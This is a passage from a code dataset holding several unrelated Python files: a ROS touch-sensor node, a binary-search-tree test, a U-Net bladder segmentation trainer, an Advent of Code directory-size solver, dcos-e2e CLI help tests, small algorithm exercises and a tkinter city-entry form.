queue_size=1) #topic name\narray = [0,0,0] # right/left/below\n#array_2 = [0,0,0] # near/ far away/ find\nlight_value = 0\n\ndef collision():\n rospy.sleep(0.3)\n r = rospy.Rate(1) # 1hz\n print(array,light_value)\n while not rospy.is_shutdown():\n array[0] = touch_sensor_right()\n array[1] = touch_sensor_left ()\n array[2] = 
touch_sensor_below()\n light_sensor()\n pub_touch_sensor.publish(data= array)\n pub_light.publish (data= light_value)\n print('right/ left/ below:', pi.read(touch_r_pin),'/', pi.read(touch_l_pin),'/',pi.read(touch_b_pin))\n print('light_a:', pi.read(light_pin_a))\n print('light_d:', pi.read(light_pin_d))\n r.sleep()\n\n\nlast_time_right = rospy.Time(0)\nlast_time_left = rospy.Time(0)\nlast_time_below = rospy.Time(0)\nlast_light_d = 1\n\n\ndef touch_sensor_right():\n global last_time_right\n if(((rospy.get_rostime()- last_time_right) > rospy.Duration(0.3,0)) & (pi.read(touch_r_pin)==0)):\n last_time_right=rospy.get_rostime()\n return 1\n else:\n return 0\n\ndef touch_sensor_left():\n global last_time_left\n if(((rospy.get_rostime()- last_time_left) > rospy.Duration(0.3,0)) & (pi.read(touch_l_pin)== 0)):\n last_time_left=rospy.get_rostime()\n return 1\n else:\n return 0\n\ndef touch_sensor_below(): \n global last_time_below\n if(((rospy.get_rostime()- last_time_below) > rospy.Duration(0.3,0)) & (pi.read(touch_b_pin)== 0)):\n last_time_below=rospy.get_rostime()\n return 1\n else:\n return 0\n\ndef light_sensor(): \n global light_value, last_light_d\n # lower value when closer \n #toward the light\n #if ((pi.read(light_pin_a)-last_light_a) < 0.0):\n # array_2 = [1, 0, 0] # near/ far away/ find\n #far away the light\n #if ((pi.read(light_pin_a)-last_light_a) > 0.0):\n # array_2[1] = [0,1,0] # near/ far away/ find\n #find the light\n #if ((((pi.read(light_pin_d) == 0) & (last_light_d == 0)) ==1) | (pi.read(light_pin_a)<40)):\n # array_2[2] = [0,0,1] # near/ far away/ find\n if ((pi.read(light_pin_d) == 0) & (last_light_d == 0)):\n light_value = 1 # near/ far away/ find\n else:\n last_light_d = pi.read(light_pin_d)\n #last_light_a = pi.read(light_pin_a)\n return light_value\n\n\nif __name__ == '__main__':\n #data = String (input('Type q to exit:'))\n #if( data == 'q' ):\n # os._exit(0)\n #else:\n # data == 'g' \n # pub_state(data)\n try:\n collision()\n rospy.spin()\n except rospy.ROSInterruptException:\n pass\n\n","repo_name":"yutingk/mobile_robot_project","sub_path":"src/cp3/src/cp3_new.py","file_name":"cp3_new.py","file_ext":"py","file_size_in_byte":3209,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"2580881006","text":"import unittest\nimport random\n\nclass Node():\n def __init__(self, value):\n self.value = value\n self.left = None\n self.right = None\n\nclass Tree(object):\n def __init__(self, root=None):\n self.root = root\n\n\n def in_order(self):\n return self.in_order_recur(self.root)\n\n def in_order_recur(self, node):\n if node:\n for val in self.in_order_recur(node.left):\n yield val\n yield node.value\n for val in self.in_order_recur(node.right):\n yield val\n\n def bst_from_arr(self, arr):\n n = len(arr)\n if n == 1:\n return Node(arr[0])\n if n == 0:\n return None\n\n mid = n // 2\n node = Node(arr[mid])\n left_half = arr[:mid]\n right_half = arr[mid + 1:]\n\n node.left = self.bst_from_arr(left_half)\n node.right = self.bst_from_arr(right_half)\n return node\n\nclass TestTree(unittest.TestCase):\n def setUp(self):\n self.arr = []\n while len(self.arr) != 20:\n num = random.randint(1, 100)\n if num not in self.arr:\n self.arr.append(num)\n\n self.T = Tree()\n self.T.root = self.T.bst_from_arr(self.arr)\n\n\n def test_tree(self):\n res = list(self.T.in_order())\n self.assertEqual(res, self.arr)\n\n\n\nif __name__ == \"__main__\":\n 
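# running this file directly executes the in-order traversal round-trip test above\n 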
unittest.main()\n\n","repo_name":"KaluEmeKalu/cracking_the_coding_interview_python_solutions","sub_path":"ch4_graphes_and_trees/q2_binary_search_tree_from_array.py","file_name":"q2_binary_search_tree_from_array.py","file_ext":"py","file_size_in_byte":1401,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"39369076214","text":"from torch.utils.data import DataLoader\nfrom torchvision import transforms\nfrom progressBar import printProgressBar\nimport medicalDataLoader\nfrom UNet import *\nfrom utils import *\n\nimport time\n\nfrom optimizer import Adam\n\ndef weights_init(m):\n if type(m) == nn.Conv2d or type(m) == nn.ConvTranspose2d:\n nn.init.xavier_normal(m.weight.data)\n elif type(m) == nn.BatchNorm2d:\n m.weight.data.normal_(1.0, 0.02)\n m.bias.data.fill_(0)\n\n\ndef fill_up_weights(up):\n w = up.weight.data\n f = math.ceil(w.size(2) / 2)\n c = (2 * f - 1 - f % 2) / (2. * f)\n for i in range(w.size(2)):\n for j in range(w.size(3)):\n w[0, 0, i, j] = \\\n (1 - math.fabs(i / f - c)) * (1 - math.fabs(j / f - c))\n for c in range(1, w.size(0)):\n w[c, 0, :, :] = w[0, 0, :, :]\n \n\n \ndef resizeTensorMaskInSingleImage(batch, scalingFactor):\n data = batch.cpu().data.numpy()\n batch_s = data.shape[0]\n numClasses = data.shape[1]\n img_size = data.shape[2]\n # TODO: Better way to define this\n resizedLabels = np.zeros((batch_s,\n int(img_size/scalingFactor),\n int(img_size/scalingFactor)))\n \n \n for i in range(data.shape[0]):\n img = data[i,:,:].reshape(img_size,img_size)\n imgL = np.zeros((img_size,img_size))\n idx1t = np.where(img==1)\n imgL[idx1t]=1\n imgRes = skiTransf.resize(imgL,(img_size/scalingFactor,img_size/scalingFactor),preserve_range=True)\n idx1 = np.where(imgRes>=0.5)\n \n imgL = np.zeros((img_size,img_size))\n idx2t = np.where(img==1)\n imgL[idx2t]=1\n imgRes = skiTransf.resize(imgL,(img_size/scalingFactor,img_size/scalingFactor),preserve_range=True)\n idx2 = np.where(imgRes>=0.5)\n \n imgL = np.zeros((img_size,img_size))\n idx3t = np.where(img==1)\n imgL[idx3t]=1\n imgRes = skiTransf.resize(imgL,(img_size/scalingFactor,img_size/scalingFactor),preserve_range=True)\n idx3 = np.where(imgRes>=0.5)\n \n imgResized = np.zeros((int(img_size/scalingFactor),int(img_size/scalingFactor)))\n imgResized[idx1]=1\n imgResized[idx2]=2\n imgResized[idx3]=3\n \n \n resizedLabels[i,:,:]=imgResized\n \n tensorClass = torch.from_numpy(resizedLabels).long()\n return Variable(tensorClass.cuda())\n \ndef runTraining():\n print('-' * 40)\n print('~~~~~~~~ Starting the training... 
~~~~~~')\n print('-' * 40)\n\n batch_size = 4\n batch_size_val = 1\n batch_size_val_save = 1\n batch_size_val_savePng = 4\n lr = 0.0001\n epoch = 1000\n root_dir = '../DataSet/Bladder_Aug'\n modelName = 'UNetG_Dilated_Progressive'\n model_dir = 'model'\n\n transform = transforms.Compose([\n transforms.ToTensor()\n ])\n\n mask_transform = transforms.Compose([\n transforms.ToTensor()\n ])\n\n train_set = medicalDataLoader.MedicalImageDataset('train',\n root_dir,\n transform=transform,\n mask_transform=mask_transform,\n augment=False,\n equalize=False)\n\n train_loader = DataLoader(train_set,\n batch_size=batch_size,\n num_workers=5,\n shuffle=True)\n\n val_set = medicalDataLoader.MedicalImageDataset('val',\n root_dir,\n transform=transform,\n mask_transform=mask_transform,\n equalize=False)\n\n val_loader = DataLoader(val_set,\n batch_size=batch_size_val,\n num_workers=5,\n shuffle=False)\n \n val_loader_save_images = DataLoader(val_set,\n batch_size=batch_size_val_save,\n num_workers=5,\n shuffle=False)\n\n val_loader_save_imagesPng = DataLoader(val_set,\n batch_size=batch_size_val_savePng,\n num_workers=5,\n shuffle=False) \n # Initialize\n print(\"~~~~~~~~~~~ Creating the model ~~~~~~~~~~\")\n num_classes = 4\n \n initial_kernels = 32\n \n # Load network\n netG = UNetG_Dilated_Progressive(1, initial_kernels, num_classes)\n softMax = nn.Softmax()\n CE_loss = nn.CrossEntropyLoss()\n Dice_loss = computeDiceOneHot()\n \n if torch.cuda.is_available():\n netG.cuda()\n softMax.cuda()\n CE_loss.cuda()\n Dice_loss.cuda()\n\n '''try:\n netG = torch.load('./model/Best_UNetG_Dilated_Progressive_Stride_Residual_ChannelsFirst32.pkl')\n print(\"--------model restored--------\")\n except:\n print(\"--------model not restored--------\")\n pass'''\n \n optimizerG = Adam(netG.parameters(), lr=lr, betas=(0.9, 0.99), amsgrad=False)\n \n scheduler = torch.optim.lr_scheduler.ReduceLROnPlateau(optimizerG, mode='max', patience=4, verbose=True,\n factor=10 ** -0.5)\n \n BestDice, BestEpoch = 0, 0\n\n d1Train = []\n d2Train = []\n d3Train = []\n d1Val = []\n d2Val = []\n d3Val = []\n \n Losses = []\n Losses1 = []\n Losses05 = []\n Losses025 = []\n Losses0125 = []\n\n print(\"~~~~~~~~~~~ Starting the training ~~~~~~~~~~\")\n for i in range(epoch):\n netG.train()\n lossVal = []\n lossValD = []\n lossVal1 = []\n lossVal05 = []\n lossVal025 = []\n lossVal0125 = []\n \n d1TrainTemp = []\n d2TrainTemp = []\n d3TrainTemp = []\n \n timesAll = []\n success = 0\n totalImages = len(train_loader)\n \n for j, data in enumerate(train_loader):\n image, labels, img_names = data\n\n # prevent batchnorm error for batch of size 1\n if image.size(0) != batch_size:\n continue\n\n optimizerG.zero_grad()\n MRI = to_var(image)\n Segmentation = to_var(labels)\n \n target_dice = to_var(torch.ones(1))\n \n ################### Train ###################\n netG.zero_grad()\n\n deepSupervision = False\n multiTask = False\n \n start_time = time.time()\n if deepSupervision == False and multiTask == False:\n # No deep supervision\n segmentation_prediction = netG(MRI)\n else:\n # Deep supervision\n if deepSupervision == True:\n segmentation_prediction, seg_3, seg_2, seg_1 = netG(MRI)\n else:\n segmentation_prediction,reg_output = netG(MRI)\n # Regression\n feats = getValuesRegression(labels)\n \n feats_t = torch.from_numpy(feats).float()\n featsVar = to_var(feats_t)\n \n MSE_loss_val = MSE_loss(reg_output,featsVar)\n \n predClass_y = softMax(segmentation_prediction)\n \n spentTime = time.time()-start_time\n \n timesAll.append(spentTime/batch_size) 
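# per-image forward-pass seconds; spentTime was measured over the whole batch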
\n \n Segmentation_planes = getOneHotSegmentation(Segmentation)\n segmentation_prediction_ones = predToSegmentation(predClass_y)\n\n # It needs the logits, not the softmax\n Segmentation_class = getTargetSegmentation(Segmentation)\n\n # No deep supervision\n CE_lossG = CE_loss(segmentation_prediction, Segmentation_class)\n if deepSupervision == True:\n \n imageLabels_05 = resizeTensorMaskInSingleImage(Segmentation_class, 2)\n imageLabels_025 = resizeTensorMaskInSingleImage(Segmentation_class, 4)\n imageLabels_0125 = resizeTensorMaskInSingleImage(Segmentation_class, 8)\n \n CE_lossG_3 = CE_loss(seg_3, imageLabels_05)\n CE_lossG_2 = CE_loss(seg_2, imageLabels_025)\n CE_lossG_1 = CE_loss(seg_1, imageLabels_0125)\n \n '''weight = torch.ones(4).cuda() # Num classes\n weight[0] = 0.2\n weight[1] = 0.2\n weight[2] = 1\n weight[3] = 1\n \n CE_loss.weight = weight'''\n\n # Dice loss\n DicesN, DicesB, DicesW, DicesT = Dice_loss(segmentation_prediction_ones, Segmentation_planes)\n DiceN = DicesToDice(DicesN)\n DiceB = DicesToDice(DicesB)\n DiceW = DicesToDice(DicesW)\n DiceT = DicesToDice(DicesT)\n\n Dice_score = (DiceB + DiceW + DiceT) / 3\n \n if deepSupervision == False and multiTask == False:\n lossG = CE_lossG \n else:\n # Deep supervision\n if deepSupervision == True:\n lossG = CE_lossG + 0.25*CE_lossG_3 + 0.1*CE_lossG_2 + 0.1*CE_lossG_1\n else:\n lossG = CE_lossG + 0.000001*MSE_loss_val\n \n \n lossG.backward()\n optimizerG.step()\n \n lossVal.append(lossG.data[0])\n lossVal1.append(CE_lossG.data[0])\n \n if deepSupervision == True:\n lossVal05.append(CE_lossG_3.data[0])\n lossVal025.append(CE_lossG_2.data[0])\n lossVal0125.append(CE_lossG_1.data[0])\n\n printProgressBar(j + 1, totalImages,\n prefix=\"[Training] Epoch: {} \".format(i),\n length=15,\n suffix=\" Mean Dice: {:.4f}, Dice1: {:.4f} , Dice2: {:.4f}, , Dice3: {:.4f} \".format(\n Dice_score.data[0],\n DiceB.data[0],\n DiceW.data[0],\n DiceT.data[0]))\n\n if deepSupervision == False:\n '''printProgressBar(totalImages, totalImages,\n done=\"[Training] Epoch: {}, LossG: {:.4f},\".format(i,np.mean(lossVal),np.mean(lossVal1)))'''\n printProgressBar(totalImages, totalImages,\n done=\"[Training] Epoch: {}, LossG: {:.4f}, lossMSE: {:.4f}\".format(i,np.mean(lossVal),np.mean(lossVal1)))\n else:\n printProgressBar(totalImages, totalImages,\n done=\"[Training] Epoch: {}, LossG: {:.4f}, Loss4: {:.4f}, Loss3: {:.4f}, Loss2: {:.4f}, Loss1: {:.4f}\".format(i,\n np.mean(lossVal),\n np.mean(lossVal1),\n np.mean(lossVal05),\n np.mean(lossVal025),\n np.mean(lossVal0125)))\n\n Losses.append(np.mean(lossVal))\n\n d1,d2,d3 = inference(netG, val_loader, batch_size, i, deepSupervision)\n \n d1Val.append(d1)\n d2Val.append(d2)\n d3Val.append(d3)\n\n d1Train.append(np.mean(d1TrainTemp).data[0])\n d2Train.append(np.mean(d2TrainTemp).data[0])\n d3Train.append(np.mean(d3TrainTemp).data[0])\n\n mainPath = '../Results/Statistics/' + modelName\n \n directory = mainPath\n if not os.path.exists(directory):\n os.makedirs(directory)\n\n ###### Save statistics ######\n np.save(os.path.join(directory, 'Losses.npy'), Losses)\n \n np.save(os.path.join(directory, 'd1Val.npy'), d1Val)\n np.save(os.path.join(directory, 'd2Val.npy'), d2Val)\n np.save(os.path.join(directory, 'd3Val.npy'), d3Val)\n\n np.save(os.path.join(directory, 'd1Train.npy'), d1Train)\n np.save(os.path.join(directory, 'd2Train.npy'), d2Train)\n np.save(os.path.join(directory, 'd3Train.npy'), d3Train)\n\n currentDice = (d1+d2+d3)/3 \n\n # How many slices with/without tumor correctly classified\n print(\"[val] 
DSC: (1): {:.4f} (2): {:.4f} (3): {:.4f} \".format(d1,d2,d3))\n \n if currentDice > BestDice:\n BestDice = currentDice\n BestDiceT = d1\n BestEpoch = i\n if currentDice > 0.7:\n print(\"~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Saving best model..... ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\")\n if not os.path.exists(model_dir):\n os.makedirs(model_dir)\n torch.save(netG, os.path.join(model_dir, \"Best_\" + modelName + \".pkl\"))\n\n # Save images\n saveImages(netG, val_loader_save_images, batch_size_val_save, i, modelName, deepSupervision)\n saveImagesAsMatlab(netG, val_loader_save_images, batch_size_val_save, i, modelName, deepSupervision)\n\n print(\"### ###\")\n print(\"### Best Dice: {:.4f} at epoch {} with DiceT: {:.4f} ###\".format(BestDice, BestEpoch, BestDiceT))\n print(\"### ###\")\n\n # This is not as we did it in the MedPhys paper\n if i % (BestEpoch + 20):\n for param_group in optimizerG.param_groups:\n param_group['lr'] = lr/2\n\n\nif __name__ == '__main__':\n runTraining()\n","repo_name":"josedolz/Progressive_Dilated_UNet","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":14382,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"9364243315","text":"import csv\nimport numpy as np\nimport matplotlib.pyplot as plt\n\ntemp = []\nprecip_b = []\nprecip_w = []\nyear = []\n\nwith open('hugh_data.csv', 'r') as csvfile:\n reader = csv.reader(csvfile,)\n next(reader, None)\n for row in reader:\n try:\n year.append(float(row[0]))\n except(ValueError):\n year.append(None)\n try:\n precip_b.append(float(row[1]))\n except(ValueError):\n precip_b.append(None)\n try:\n precip_w.append(float(row[2]))\n except(ValueError):\n precip_w.append(None)\n try:\n temp.append(float(row[3]))\n except(ValueError):\n temp.append(None)\n\n\nfig, ax1 = plt.subplots()\n\nax1.plot(year, precip_b, 'b-')\nax1.set_xlabel('Year')\n# Make the y-axis label, ticks and tick labels match the line color.\nax1.set_ylabel('Precip Bunton', color='b')\nax1.tick_params('y', colors='b')\n\nax2 = ax1.twinx()\nax2.plot(year, temp, 'r.')\nax2.set_ylabel('Temperature Fluctuation', color='r')\nax2.tick_params('y', colors='r')\n\nfig.tight_layout()\nplt.show()\n","repo_name":"gkelly900/hugh","sub_path":"hugh.py","file_name":"hugh.py","file_ext":"py","file_size_in_byte":1083,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"3897762437","text":"#!/usr/bin/env python3\nimport pytest\nimport parse\nimport flatdict\nfrom pprint import pprint\n\nINPUT = 'day7/test_input.txt'\n# INPUT = 'day7/example.txt'\n\ndef main():\n\n input_file = open(INPUT, 'r')\n Lines = input_file.readlines()\n \n import collections\n # print([item for item, count in collections.Counter(Lines).items() if count > 1])\n # dirs = parse_dirs(Lines, '/', 0)\n dirs = parse_dirs_new(Lines)\n print (dirs)\n dirs = dirs.reset_head()\n print (dirs)\n list = dirs.flatten()\n print (list)\n free_space(list)\n # total_sizes(list)\n \ndef total_sizes(list):\n total = 0\n list.sort()\n for size in list:\n if (size <= 100000):\n total += size\n print (f\"Puzzle anser is {total}\")\n \ndef free_space(list):\n disk_size = 70000000\n print(f\"Disk size = {disk_size}\")\n list.sort()\n space_used = list.pop()\n print(f\"Space used = {space_used}\")\n space_left = disk_size - space_used\n print(f\"Space left = {space_left}\")\n\n needed_space = 30000000\n print(f\"Update space needed = {needed_space}\")\n\n needed_space -= space_left\n print(f\"Update 
space 2free = {needed_space}\")\n \n \n\n print (list)\n for size in list:\n if size > needed_space:\n print (size)\n break\n 2143088\n 2042410\n \ndef flatten_sizes(Dirs):\n size_list = []\n if type(Dirs) is dict:\n for key in Dirs:\n if key == \"size\":\n print (Dirs[\"size\"])\n size_list.append(int(Dirs[\"size\"]))\n else:\n size_list.extend(flatten_sizes(Dirs[key]))\n else:\n if (len(Dirs) > 0):\n for item in Dirs:\n size_list.extend(flatten_sizes(item))\n return size_list\n\ndef parse_dirs(Lines, start_dir, idx):\n dirs = []\n log = False\n size = 0\n for i in range (idx, len(Lines)):\n line = Lines[i].strip()\n if (line.startswith(\"$ cd \" + start_dir)):\n for j in range (i+2, len(Lines)):\n newline = Lines[j].strip()\n if (newline.startswith(\"$ \")):\n break\n if (newline.startswith(\"dir \")):\n new_dir = parse_dirs(Lines, newline.split(\" \")[1], j)\n dirs.append(new_dir)\n size += new_dir[\"size\"]\n else:\n size += int(newline.split(\" \")[0])\n break\n return {start_dir: dirs, \"size\": size}\n\nclass Directory():\n def __init__(self, parent, name):\n self.name = name\n self.parent = parent\n self.files = {}\n self.size = 0\n if self.parent == None:\n self.parent = self\n \n def reset_head(self):\n while self.name != \"/\":\n self = self.get_parent()\n print (self)\n return self\n\n def flatten(self):\n size_arr = [self.size]\n for filename in self.files:\n size_arr.extend(self.files[filename].flatten())\n return size_arr\n\n def __str__(self):\n string = self.name\n return string\n \n def add_dir(self, Name):\n self.files[Name] = Directory(self,Name)\n \n def add_file(self, size):\n self.size += size\n if self.name != '/':\n self.parent.add_file(size)\n\n def get_child(self, Name):\n if Name in self.files:\n return self.files[Name]\n else:\n print (f\"WARN {Name} not in filesystem\")\n return self\n \n def get_parent(self):\n return self.parent\n\ndef parse_dirs_new(Lines):\n head = Directory(None, \"/\")\n dpth = -1\n for line in Lines:\n line = line.strip()\n if (line.startswith(\"$ cd ..\")):\n head = head.get_parent()\n dpth -= 1\n elif (line.startswith(\"$ cd\")):\n dpth +=1\n dirnm = line.split(\" \")[2]\n head = head.get_child(dirnm)\n elif (line.startswith(\"$ ls\")):\n continue\n elif (line.startswith(\"dir \")):\n dirnm = line.split(\" \")[1]\n head.add_dir(dirnm)\n continue\n else:\n size = line.split(\" \")[0]\n head.add_file(int(size))\n print ((dpth+1)*\" \" + line)\n return head\n \n\nif __name__ == '__main__':\n main()\n \n\n\n\n### PYTEST ###\n\ndef test_process():\n assert True\n # assert process(\"bvwbjplbgvbhsrlpgdmjqwftvncz\") == 5\n # assert process(\"nppdvjthqldpwncqszvftbrmjlhg\") == 6\n # assert process(\"nznrnfrfntjfmvfwmzdfjlvtqnbhcprsg\") == 10\n # assert process(\"zcfzfwzzqfrljwzlrfnpqdbhtmscgvjw\") == 11\n\n","repo_name":"tjsander/advent2022","sub_path":"day7/day7.py","file_name":"day7.py","file_ext":"py","file_size_in_byte":4609,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"26506749761","text":"from ast import List\n\n\nclass solution:\n def maxAreaBruteForce(self, height: List[int]) -> int:\n res = 0 # define the result\n\n for l in range(len(height)):\n for r in range(l+1, len(height)):\n area = (r -l) * min(height[l], height[r]) # use bottleneck to find height\n res = max(res, area)\n return res \n\n def maxAreaLinear(self, height: List[int]) -> int:\n res = 0\n l, r = 0, len(height) -1\n\n while l < r:\n area = (r -l) * min(height[l], height[r]) # use bottleneck to find 
height\n res = max(res, area)\n\n if height[l] < height[r]:\n l += 1\n elif height[r] < height[l]:\n r -= 1\n else: #if equal\n r -= 1 \n return res","repo_name":"RebeccaSchmelzer/Practice","sub_path":"Leetcode/blind-75/container-water.py","file_name":"container-water.py","file_ext":"py","file_size_in_byte":806,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"20737834941","text":"# 문제\n# 땅 위에 달팽이가 있다. 이 달팽이는 높이가 V미터인 나무 막대를 올라갈 것이다.\n\n# 달팽이는 낮에 A미터 올라갈 수 있다. 하지만, 밤에 잠을 자는 동안 B미터 미끄러진다. 또, 정상에 올라간 후에는 미끄러지지 않는다.\n\n# 달팽이가 나무 막대를 모두 올라가려면, 며칠이 걸리는지 구하는 프로그램을 작성하시오.\n\n# 입력\n# 첫째 줄에 세 정수 A, B, V가 공백으로 구분되어서 주어진다. (1 ≤ B < A ≤ V ≤ 1,000,000,000)\n\n# 출력\n# 첫째 줄에 달팽이가 나무 막대를 모두 올라가는데 며칠이 걸리는지 출력한다.\n\n# 예제 입력 \n# 2 1 5\n# 예제 출력\n# 4\n\n\n\n# A,B,V = map(int, input().split())\n\n# cnt = 0 #며칠이 걸리는지\n# high = 0 #달팽이 높이\n\n# while True:\n# cnt += 1\n# high += A\n# if high >= V:\n# print(cnt)\n# break\n# high -= B\n\n\n# 달팽이 하루 이동거리는 (낮이동 - 밤이동)\n# 정상에 도착하면 미끄러지지 않으니까 올라갈 높이는 (나무높이 - 밤이동)\n# 나무높이 = (낮이동 - 밤이동) * (day-1) + 낮이동 \n\n# (나무높이 - 밤이동) = (낮이동 - 밤이동) * day\n\n\nfrom math import *\nA,B,V = map(int, input().split())\n\nday = (V - B) / (A - B)\n\nprint(ceil(day))","repo_name":"gestirn717/Practice","sub_path":"math1/test_2869_math.py","file_name":"test_2869_math.py","file_ext":"py","file_size_in_byte":1323,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"1661614009","text":"\"\"\"\nTests for the Vagrant CLI.\n\nThis mostly provides error case coverage.\nWe rely mostly on manual testing.\nThis is because automated tests for this would be very slow.\n\"\"\"\n\nimport os\nfrom pathlib import Path\nfrom typing import List\n\nimport pytest\nfrom click.testing import CliRunner\n\nfrom dcos_e2e_cli import dcos_vagrant, minidcos\n\n_SUBCOMMANDS = [[item] for item in dcos_vagrant.commands.keys()]\n_BASE_COMMAND = [[]] # type: List[List[str]]\n_COMMANDS = _BASE_COMMAND + _SUBCOMMANDS\n\n\nclass TestHelp:\n \"\"\"\n Test help texts.\n \"\"\"\n\n @pytest.mark.parametrize(\n 'command',\n _COMMANDS,\n ids=[str(cmd) for cmd in _COMMANDS],\n )\n def test_help(self, command: List[str]) -> None:\n \"\"\"\n Expected help text is shown for ``minidcos vagrant`` commands.\n\n This help text is defined in files.\n To update these files, run the command\n ``bash admin/update_cli_tests.sh``.\n \"\"\"\n runner = CliRunner()\n arguments = ['vagrant'] + command + ['--help']\n result = runner.invoke(minidcos, arguments, catch_exceptions=False)\n assert result.exit_code == 0\n help_output_filename = '-'.join(['dcos-vagrant'] + command) + '.txt'\n help_outputs_dir = Path(__file__).parent / 'help_outputs'\n expected_help_file = help_outputs_dir / help_output_filename\n try:\n expected_help = expected_help_file.read_text()\n assert result.output == expected_help\n except (AssertionError, FileNotFoundError): # pragma: no cover\n if os.getenv('FIX_CLI_TESTS') == '1':\n help_outputs_dir.mkdir(exist_ok=True)\n expected_help_file.touch()\n expected_help_file.write_text(result.output)\n else:\n raise\n\n\nclass TestDoctor:\n \"\"\"\n Tests for the ``doctor`` subcommand.\n \"\"\"\n\n @pytest.mark.skipif(\n os.environ.get('TRAVIS') == 'true',\n reason='It is not possible to run VirtualBox on Travis CI',\n )\n @pytest.mark.skipif(\n os.environ.get('GITHUB_ACTIONS') == 'true',\n reason='It is not possible to run VirtualBox on GitHub Actions',\n )\n def test_doctor(self) -> None: # pragma: no cover\n \"\"\"\n No 
exception is raised by the ``doctor`` subcommand.\n \"\"\"\n runner = CliRunner()\n result = runner.invoke(\n minidcos,\n ['vagrant', 'doctor'],\n catch_exceptions=False,\n )\n assert result.exit_code == 0\n","repo_name":"dcos/dcos-e2e","sub_path":"tests/test_cli/test_dcos_vagrant/test_cli.py","file_name":"test_cli.py","file_ext":"py","file_size_in_byte":2514,"program_lang":"python","lang":"en","doc_type":"code","stars":61,"dataset":"github-code","pt":"40"} +{"seq_id":"2563369103","text":"from itertools import permutations\n\ndef solution(numbers):\n answer = 0\n \n for i in range(1, len(numbers) + 1):\n num_list = list(set(permutations(numbers, i))) # set 자료구조를 이용하여 중복 제거\n for num in num_list:\n if num[0] != \"0\": # 첫번째 수가 0이 아닐 경우\n num = int(\"\".join(num)) # 합쳐준 후, 숫자형으로 변환\n if isPrimeNumber(num): # 소수일 경우\n answer += 1\n\n return answer\n\ndef isPrimeNumber(num):\n if num <= 1:\n return False\n \n for i in range(2, int(num ** 0.5) + 1):\n if num % i == 0:\n return False\n \n return True","repo_name":"2do1/Algorithm","sub_path":"Programmers/Level2/소수 찾기/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":692,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"21067666753","text":"# we can use the idea of bisection search to determine if a character is in a string, so long as the string is sorted in alphabetical order.\n# Implement the function isIn(char, aStr) which implements the above idea recursively to test if char is in aStr.\n# char will be a single character and aStr will be a string that is in alphabetical order.\n# The function should return a boolean value.\n\ndef isIn(char, aStr):\n '''\n char: a single character\n aStr: an alphabetized string\n \n returns: True if char is in aStr; False otherwise\n '''\n # Your code here\n char = char.lower()\n aStr = aStr.lower()\n index = int(len(aStr) / 2)\n if aStr == '':\n return False\n elif index == 0:\n return char == aStr[0]\n elif char < aStr[index]:\n aStr = aStr[0:index]\n return isIn(char, aStr)\n else:\n aStr = aStr[index:]\n return isIn(char, aStr)\n","repo_name":"hugojing/mitx-6.00.1x","sub_path":"week-2-exercise/is-in.py","file_name":"is-in.py","file_ext":"py","file_size_in_byte":852,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"36391561008","text":"import tkinter as tk\n\nfrom geopy.distance import geodesic\n\nfrom src.utils.add_city import add_city as add_city_back\n\n\ndef add_city_window():\n \"\"\"\n Créer la fenêtre de création d'une ville.\n \"\"\"\n root = tk.Toplevel()\n root.wm_title(\"Window\")\n\n # Champ d'entrée du nom de la ville\n city_label = tk.Label(root, text=\"Nom de la ville\")\n city_label.grid(row=0, column=0)\n city_entry = tk.Entry(root)\n city_entry.grid(row=0, column=1)\n\n # Champ d'entrée de la latitude\n latitude_label1 = tk.Label(root, text=\"Latitude\")\n latitude_label1.grid(row=1, column=0)\n latitude_entry = tk.Entry(root)\n latitude_entry.grid(row=1, column=1)\n latitude_label2 = tk.Label(root, text=\"°\")\n latitude_label2.grid(row=1, column=2)\n latitude_entry2 = tk.Entry(root)\n latitude_entry2.grid(row=1, column=3)\n latitude_label3 = tk.Label(root, text=\"'N\")\n latitude_label3.grid(row=1, column=4)\n\n # Champ d'entrée de la longitude\n longitude_label = tk.Label(root, text=\"Longitude\")\n longitude_label.grid(row=2, column=0)\n longitude_entry = tk.Entry(root)\n longitude_entry.grid(row=2, column=1)\n longitude_label2 = 
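# --- Editor's note: hedged equivalent of the recursive isIn above, using the
# standard library's bisect module instead of slicing the string on each call.
# Same O(log n) bisection idea; assumes aStr is sorted, as the exercise guarantees.
import bisect

def is_in_iterative(char, a_str):
    char, a_str = char.lower(), a_str.lower()
    i = bisect.bisect_left(a_str, char)   # bisect works on any sorted sequence, str included
    return i < len(a_str) and a_str[i] == char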
tk.Label(root, text=\"°\")\n longitude_label2.grid(row=2, column=2)\n longitude_entry2 = tk.Entry(root)\n longitude_entry2.grid(row=2, column=3)\n\n # Options du dropdown de sélection de la direction\n options = [\"W\", \"E\"]\n\n selected_direction = tk.StringVar()\n selected_direction.set(options[0])\n\n # Champ d'entrée de la direction des coordonées\n drop = tk.OptionMenu(root, selected_direction, *options)\n drop.grid(row=2, column=4)\n\n def on_save():\n \"\"\"\n Fonction de sauvegarde des données entrée dans le formulaire.\n \"\"\"\n lat = f\"{latitude_entry.get()}° {latitude_entry2.get()}'N\"\n lng = f\"{longitude_entry.get()}° {longitude_entry2.get()}'{selected_direction}\"\n\n add_city_back(city_entry.get(), lat, lng)\n\n # Bouton de sauvegarde\n save = tk.Button(root, text=\"Sauvegarder\", command=on_save)\n save.grid(row=4, column=0)\n\n # Exit button\n b = tk.Button(root, text=\"Quitter\", command=root.destroy)\n b.grid(row=4, column=1)\n\n\ndef calc_dist_window(cities):\n \"\"\"\n 